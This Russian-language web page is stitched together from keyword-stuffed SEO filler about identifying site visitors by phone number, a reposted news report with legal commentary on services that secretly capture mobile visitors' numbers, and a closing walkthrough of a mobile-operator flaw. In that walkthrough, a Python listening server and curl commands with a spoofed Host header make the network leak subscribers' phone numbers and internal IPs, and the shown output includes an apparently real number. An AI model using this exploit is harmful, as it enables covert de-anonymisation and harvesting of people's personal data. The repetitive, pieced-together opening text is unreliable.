Сталкивались ли Вы с таким, что в поисках чего-либо в интернете Вам вдруг неожиданно звонит менеджер одного из сайтов и озвучивает выгодное предложение? Вау! а как они узнали мой телефон?! Я не оставлял заявку. Интернет уже давно не анонимен. До этого момента такие функции были доступны, пожалуй, только интернет провайдерам, крупному бизнесу, банкам, социальным сетям и силовым структурам. Но теперь даже самый обычный человек может связаться с Вами в любое время суток. Все что необходимо для этого – номер телефона, который, к тому же, можно указать в своем профиле на каком-нибудь сайте. Это не новость, это реальность. Теперь, чтобы связаться с человеком, достаточно просто знать его телефон. И не важно, где он сейчас находится. Человек может быть за тысячи километров от Вас. А Вы можете быть на другом конце планеты. Но, как говорится, «звоночек» не заставит себя долго ждать. Идентификация посетителя сайта по его номеру. Какие сервисы собирают информацию о пользователях. Как отслеживать посетителей сайта по номеру телефона. Получение информации о клиентах сайта. Какой сервис позволяет отследить посетителя пришедшего на сайт по номеру мобильного телефона. Программный комплекс для определения посетителя сайта. Просмотр посетителей сайта и их номеров телефонов. Кто посещал сайт из посетителей. Как посмотреть кто был на сайте до тебя. Как найти человека по номеру его телефона. Что такое идентификаторы посетителей сайтов и как их можно отследить. Как отслеживать клиентов по номеру мобильного телефона. Определение клиентов сайта по их номеру. Как собирать информацию о посетителях сайтов. Как определить посетителя по номеру и получить его данные. Как узнать, что посетитель зашел на сайт через сервис «Яндекс.Метрика». Как отследить посетителей по телефону. Определение номеров, с которых заходили на сайт. Как найти номер телефона по IP-адресу.
Как отслеживать посетителей сайта по номеру телефона. Получение информации о клиентах сайта. Определение номера телефона, с которого был совершен звонок. Существует множество сервисов с помощью которых можно отследить посетителей сайта или определить номер телефона, который был использован для входа на сайт. Давайте рассмотрим несколько наиболее популярных и эффективных из них:
И вот тут-то, если вы не будете знать, кто эти люди, то вы можете упустить из виду очень важный момент. Ведь они могут быть потенциальными клиентами.
В современном мире, когда все больше и больше людей становятся зависимыми от интернета, сложно представить себе человека, который не пользуется сетью. На сегодняшний день, практически каждый имеет свой собственный аккаунт в социальных сетях, для того чтобы общаться с друзьями, узнавать полезную информацию, делиться фотографиями и многое другое.
В настоящее время существует множество сервисов для сбора информации о посетителях сайта. Некоторые из них, например, Яндекс Метрика, позволяют отслеживать посетителей, узнавать их ID, а также получать информацию об их действиях на сайте. Определение контактов посетителей сайта. Узнать номер телефона посетителя сайта. Захват пользователей на сайте. Узнать номер телефона кто заходил на сайт. Идентификация посетителей сайтов сервисы. Но, как правило, данные, которые можно получить таким образом, носят достаточно общий характер и не дают возможности идентифицировать посетителя сайта и по возможности узнать его телефон и другие данные.
Но это не значит что на этих сайтах можно узнать номер мобильного телефона пользователя. Дело в том, что эти сервисы работают только с доменами, а не с IP адресами. Но узнать телефонный номер с которого звонят или с которого отправляют смс, можно. Узнать номера телефонов посетителей вашего сайта, которые заходили к вам на сайт (в том числе и тех, кто был зарегистрирован на этом сайте) можно с помощью сервиса.
Россиян может ждать настоящая эпидемия телефонного спама с предложениями покупки недвижимости и разных товаров. С конца прошлого года у маркетологов — пока в основном риелторских компаний — стремительно набирает популярность технология, позволяющая определять номера посетителей, зашедших на сайт с мобильных устройств. После чего людей начинают атаковать звонками с предложениями о покупке. А это нарушает не только покой граждан, но и сразу два закона — «О персональных данных» и «О рекламе», поясняют юристы. Специалисты по кибербезопасности сетуют, что нелегальная практика распространяется из-за того, что россияне не жалуются в Роскомнадзор и Федеральную антимонопольную службу (ФАС), потому что не понимают, каким образом нарушаются их права.
В последнее время на форумах по интернет-маркетингу появилось множество жалоб на настойчивые рекламные звонки после посещения профильных сайтов. Обычно на такие порталы пользователи попадают, перейдя по ссылке в соцсетях. При этом свои номера на сайтах граждане, конечно, не оставляют.
Вот характерное сообщение от пользователя Nick K, который приводит рассказ своей знакомой (публикуется с сохранением стиля, орфографии и пунктуации): «В Facebook есть реклама. Мне по понятным причинам показывают частенько рекламу разных жилых комплексов. Причём, благодаря моим поездкам, жильё мне предлагают купить не только в Москве, но и в Питере и Екб). Так вот, заметила интересное. Заходишь на сайт, смотришь там планировки и прочее, видишь цену — отползаешь. Нигде никаких контактных данных не оставляешь. Через полчаса-час звонок. «Вы интересовались жилым комплексом».
Фото: Global Look Press/Ralph Peters
«Известия» поставили эксперимент, активно покликав со смартфона сайты застройщиков, рекламой которых заполнена лента FB. В первый же день поступило примерно пять–шесть звонков. Дальше — больше. В некоторые дни звонили до 10 представителей различных компаний. На вопрос, откуда они узнали телефон, сотрудники колл-центра отвечали, что получили номер от маркетологов или обладают технологией по его определению во время посещения сайта с мобильного устройства.
Технология утечки
Старший пентестер отдела аудита компании «Диджитал Секьюрити» Александр Багов пояснил «Известиям», что сами компании вряд ли обладают подобными технологиями, тем более перехват номеров, скорее всего, носит массовый характер.
— Наиболее вероятным представляется обращение к третьим лицам. Компании, предоставляющие сервисы по определению телефонных номеров посетителей портала, действительно существуют, и их легко найти в сети, — отметил специалист по кибербезопасности. — Подробно технологию они не расписывают, предлагая клиентам вставить на свой сайт код для определения данных посетителей.
Сегодня фактически все сайты стремятся максимально узнать пользователя и потом выйти на него с контекстной рекламой, пояснил руководитель аналитического центра Zecurion Владимир Ульянов. По его словам, для трекинга (отслеживания предложений) существует множество различных инструментов. Те же соцсети являются хорошим источником информации о человеке — возможно узнать и телефон, если он указан в профиле. Кстати, зачастую на сайты компаний пользователи соцсетей попадают, просматривая в ленте контекстную рекламу, таргетированную на них.
Фото: ИЗВЕСТИЯ/Алексей Майшев
— Узнать номер тех, кто заходит с мобильных устройств, технически несложно. На сайте устанавливается специальный код, который позволяет определить номер телефона и воздействовать на потребителя не через контекстную рекламу, а через непосредственное общение. Ведь если вы заходите на сайт, например, застройщика, это значит, что вы интересуетесь покупкой недвижимости, и обращение будет целевым и более эффективным, — полагает Владимир Ульянов.
Задав в поисковой системе запрос «Фиксация номера телефона посетителей сайта», можно получить десятки предложений от компаний, которые представляют такие услуги. Открыв любую из ссылок, вы узнаете, что за счет такой технологии можно нарастить клиентскую базу на 25–300%. Также маркетологам обещают, что могут определить номера до 80% посетителей сайтов. Оплата, как правило, 33 рубля за номер. Первые 10–15 образцов предоставляются безвозмездно.
Нужно отметить, что после посещения сайта автор этих строк получила от компании звонок уже через три минуты. Бодрый молодой человек предложил воспользоваться услугами по фиксации номеров и даже заявил, что их сайт имеет лицензию Роскомнадзора. В пресс-службе ведомства удивились этому и обещали проверить. Кстати, официально пообщаться с представителями таких фирм невозможно, поскольку звонки поступают с номеров виртуальных АТС, перезвонить на которые невозможно. То же и в отношении продавцов недвижимости. Кстати, из-за этого нет гарантии, что вы избавитесь от навязчивых звонков, занеся телефон в черный список.
Эффект снежного кома
В дальнейшем использование таких технологий будет распространяться на многие потребительские секторы, уверены эксперты.
— Пока не все компании используют их, поскольку они дорогие. Не только в плане получения информации, но и расходов на персонал и инфраструктуру. Кроме того, результат неочевиден, поскольку большинство реагирует на навязчивые предложения с раздражением. Поэтому пока данная технология в основном используется застройщиками и компаниями по продаже недвижимости, которые предлагают дорогой товар, и тем ценнее для них каждый перспективный покупатель, — отметил Владимир Ульянов.
По мнению Александра Багова, использование таких методов стало возможным, потому что люди, на которых обрушивается шквал звонков, просто не уточняют, почему позвонили именно им, и, соответственно, никуда не жалуются.
И совершенно напрасно, считает юрист международной юрфирмы «Ильяшев и партнеры» Руслан Маннапов: подобные действия нарушают сразу два закона — «О персональных данных» и «О рекламе».
Фото: ИЗВЕСТИЯ/Александр Казаков
— Учитывая судебную практику, номер телефона можно отнести к персональным данным гражданина. А их обработка, как известно, допускается только после получения согласия субъекта, — уточнил юрист. — Фиксация номера телефона человека, который просматривал сайт застройщика со смартфона, в данном случае должна быть квалифицирована как обработка персданных.
Он объяснил, что под это определение подпадает и любое действие, которое совершается с использованием средств автоматизации с персональными данными, включая их сбор, запись, систематизацию, накопление, хранение, извлечение, использование и т. д.
По словам Руслана Маннапова, за нарушение законодательства в области персональных данных, а именно в случае их незаконной обработки, устанавливается штраф до 75 тыс. рублей. Он посоветовал гражданам в таких случаях обязательно обращаться в Роскомнадзор.
Пресс-служба ведомства сообщила «Известиям», что пока таких жалоб не поступало. Там заверили, что если обращения поступят и будут выявлены нарушения, Роскомнадзор «примет установленные законодательством меры, направленные на защиту прав граждан как субъектов персональных данных».
Приложите запись
Еще более существенные штрафы грозят компаниям за нарушение закона «О рекламе».
— По общему правилу распространение рекламы по сетям электросвязи, а к ним относится и телефонная, допускается только при условии предварительного согласия абонента или адресата на получение рекламы, — объяснил Руслан Маннапов.
По его словам, за это нарушение законодательство предусматривает штраф для юридических лиц в размере от 100 до 500 тыс. рублей. Но для того чтобы наказание нашло «героев», необходимо обратиться в управление Федеральной антимонопольной службы.
Фото: ИЗВЕСТИЯ/Дмитрий Коротаев
В пресс-службе ФАС «Известиям» подтвердили: в случае, если реклама распространяется по телефону без согласия абонента, это является нарушением статьи 18 закона «О рекламе».
— Для возможности антимонопольному органу применить свои полномочия должно быть подано заявление с необходимыми сведениями, которые указаны на сайте ФАС России, в том числе согласие на раскрытие тайны связи, — сообщили в ведомстве.
Кроме того, уточнили в пресс-службе, для точной оценки действий предполагаемого нарушителя нужно приложить к обращению рекламу или в данном случае запись звонка.
Не очень законный способ собирать персональные данные, тем не менее, сложно наказать – не каждый сможет записать разговор и подать жалобу в ФАС.
В сети рассказывают о новом способе привлечения клиентов – отслеживание номеров телефонов посетителей сайтов, которые заходят на них со смартфонов. Этим, в частности, злоупотребляют компании-застройщики, которые к тому же могут отследить, из какого города заходил абонент.
Абоненты жалуются в сети – они не оставляли никаких контактных данных и не давали согласия на звонок, тем не менее, получают массовые звонки с рекламными предложениями. Эксперимент повторили журналисты «Известий», которые получили десятки звонков, лишь просмотрев несколько сайтов из рекламы в сети Facebook.
Конечно, сами компании-рекламодатели технически не имеют возможностей отслеживать номера телефонов – но вообще такие технологии существуют, и их продают соответствующие компании. Выглядит это как вставка определенного элемента в исходный код страницы.
Использование соцсетей еще сильнее упрощает задачу: рекламодатели могут гибко настроить таргетированную рекламу, и при звонке уже знать основные данные о человеке и его интересы.
Услуги по «фиксации номера посетителей» предлагают десятки сервисов в сети. За каждый номер они просят 33 рубля, первые 10 номеров обычно идут бесплатно. По информации на сайтах таких сервисов, отследить удается номера до 80% посетителей сайтов.
Что интересно, после посещения сайта такого сервиса можно получить звонок уже от него – буквально через несколько минут (что служит подтверждением эффективности предложения). Представители сервисов уверяют, что имеют даже лицензии от Роскомнадзора, чем в ведомстве были весьма удивлены. Но пообщаться с ними еще не получается, они используют виртуальные АТС.
На данный момент такими технологиями пользуются лишь там, где доход от одного клиента высокий (в силу дороговизны услуг от таких сервисов), но в будущем, уверены эксперты, их будут использовать многие другие секторы.
Юристы уверены – это является нарушением сразу двух законов, «О рекламе» и «О персональных данных». Так, номер телефона является частью персональных данных, обработка которых допускается лишь с согласия абонента.
Что касается законодательства о рекламе, распространять ее по сетям электросвязи можно лишь с предварительного согласия абонента. Иначе рекламодателю грозит штраф в сумме от 100 до 500 тысяч рублей. Но наказать их сложно, для этого нужно составить заявление и приложить к нему аудиозапись разговора.
Система глубокого анализа трафика настроена так, что добавляет служебные HTTP-заголовки при выполнении HTTP-запроса на сайты (хосты) из списка, определяемого оператором. В заголовках может содержаться внутренний IP-адрес абонента, номер телефона (MSISDN), IMEI и IMSI-идентификаторы, идентификатор базовой станции (вышки), к которой подключен абонент (ECI/TAC).
Нам потребуется установить на сервер в интернете простой HTTP-сервер, который будет принимать запрос, показывать его на экране, и отправлять HTTP-ответ. Что-то вроде этого:
#!/usr/bin/env python3
import socketserver
class MyTCPHandler(socketserver.BaseRequestHandler):
def handle(self):
while True:
r = self.request.recv(8192)
if b"rnrn" in r or b"nn" in r:
break
if not r:
return
print("-----rn" + r.decode() + "-----")
self.request.sendall(b"HTTP/1.1 200 OKrnContent-Length: 2rnrn")
self.request.sendall(b"OK")
return
if __name__ == "__main__":
HOST, PORT = "0.0.0.0", 80
socketserver.ForkingTCPServer.allow_reuse_address = True
server = socketserver.ForkingTCPServer((HOST, PORT), MyTCPHandler)
server.allow_reuse_address = True
server.serve_forever()
Отправим HTTP-запрос, используя SIM-карту Мегафон:
$ curl myserver.com
OK
На сервер пришло:
GET / HTTP/1.1
Host: myserver.com
User-Agent: curl/7.51.0
Accept: */*
Ничего необычного. Изменим заголовок Host на какой-нибудь внутренний домен оператора, например, на основной сайт megafon.ru:
$ curl myserver.com -H "Host: megafon.ru"
На сервере:
GET / HTTP/1.1
Host: megafon.ru
User-Agent: curl/7.51.0
Accept: */*
X-Real-IP: 100.114.20.123
X-NOKIA-MSISDN: 79319350195
На сервер пришли не только HTTP-заголовки, отправленные curl, но и дополнительные заголовки X-Real-IP и X-NOKIA-MSISDN, содержащие внутренний IP-адрес (за Carrier-grade NAT) и номер телефона!
Почему так получилось? По всей видимости, при составлении списка забыли привязать конкретные домены к конкретным IP-адресам или диапазонам, и проверка открытия сайта из листа выполняется только сравнением HTTP-заголовка Host.
Источник(там намного больше тонкостей, например, перечень внутренних доменов): https://habrahabr.ru/post/345852/
P.S.: не стоит забывать, что это именно уязвимость, то есть это ошибка в системах мобильных операторов, вполне возможно, что скоро эту дырку закроют.
P.S.P.S.: мтс данную уязвимость исправил.